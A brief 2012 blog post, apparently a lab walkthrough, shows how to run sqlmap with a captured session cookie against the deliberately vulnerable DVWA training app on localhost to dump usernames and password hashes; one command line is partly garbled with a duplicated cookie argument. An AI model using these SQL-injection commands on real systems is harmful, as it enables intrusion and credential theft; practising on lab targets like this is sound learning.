Learn Harder: DVWA Exploit (Medium)

Selasa, 23 Oktober 2012

DVWA Exploit (Medium)

1. open your DVWA , and login
username = admin
password = password

2.setting DVWA security become Medium

and then choose Sql Injection and the click submit

check cookie in burpsuite

4. open terminal, and change direktori to "sqlmap "

5. running sqlmap, with cookie sand result last submit

"./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "Cookie: securityid=%27&Submit=Submit#" --cookie "Cookie: security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5"

and this result

6. search password
"./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "Cookie: securityid=%27&Submit=Submit#" --cookie "Cookie: security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5" --Users --password

and this result

sorry not to root, I am still trying to get root

Learn Harder

Selasa, 23 Oktober 2012

DVWA Exploit (Medium)

Tidak ada komentar:

Posting Komentar